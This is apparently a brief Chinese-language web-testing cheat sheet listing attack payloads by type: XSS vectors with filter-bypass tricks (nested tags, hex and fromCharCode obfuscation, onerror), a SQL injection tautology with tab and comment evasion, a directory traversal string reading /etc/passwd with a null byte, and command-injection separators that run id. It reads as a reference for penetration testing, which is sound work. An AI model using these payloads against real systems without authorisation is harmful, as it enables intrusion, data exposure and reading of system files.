一、XSS
<script>alert(1)</script> (大小写)
<scr<script>ipt>alert(1)</scr</script>ipt>二次构造
<img src=‘#‘ onerror=‘alert(1)‘ />
<script>eval("\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29")</script>
<img src="javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">
二、SQL注入
?name=root‘ or ‘1‘=‘1(TAB代替空格、注释/**/)
三、Directory traversal
../../../../etc/passwd%00
四、Command injection
`id`
&& id(&编码为%26)
|| id
换行符(%0a)
附:HTML URL编码 http://www.w3cschool.cn/html_ref_urlencode.html
时间: 2024-10-21 12:00:36